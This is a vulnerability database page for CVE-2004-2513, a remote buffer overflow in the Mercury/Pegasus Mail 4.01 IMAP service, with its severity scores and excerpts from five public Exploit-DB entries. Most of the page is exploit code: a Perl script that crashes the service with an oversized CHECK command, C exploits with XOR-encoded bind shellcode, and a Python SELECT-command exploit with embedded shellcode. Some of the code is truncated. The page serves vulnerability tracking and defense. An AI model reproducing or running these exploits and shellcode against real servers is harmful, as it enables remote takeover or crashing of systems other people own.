CVE-2004-2513
published 2004-12-31CVE-2004-2513: Buffer overflow in the IMAP service of Mercury (Pegasus) Mail 4.01 allows remote attackers to execute arbitrary code via a long SELECT command.
PriorityP343critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.78%
94.9th percentile
Buffer overflow in the IMAP service of Mercury (Pegasus) Mail 4.01 allows remote attackers to execute arbitrary code via a long SELECT command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | pegasus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
exploitdb·2007-08-26
CVE-2004-2513 Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
Mercury/32 Mail Server 3.32
#include
#include
#include
#pragma comment(lib,"ws2_32")
#include
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
exploitdb·2004-12-01
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
---
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
** By: [email protected]
**
** Notes: Second public release and both of them are murcury32 ;)
** Again someone posted some dos code :( why bother?
** If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not
** change. I did not check the asm but its prob using the same routine for all 14 commands.
**
** Date: 12/01/04
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
/
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
exploitdb·2004-11-30
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
---
/* whitehat.co.il comments removed do to muts love */
/** Remote Mercury32 Imap exploit
** By: [email protected]
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
//XOR with 0x96 (267 0x10B bytes)
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
exploitdb·2004-11-29
CVE-2004-2513 Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
---
#########################################################
# #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the SELECT command #
# #
#########################################################
import struct
import socket
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Lame calc.exe shellcode - dont expect miracles!
sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb
No writeups or analysis indexed.
2004-12-31
Published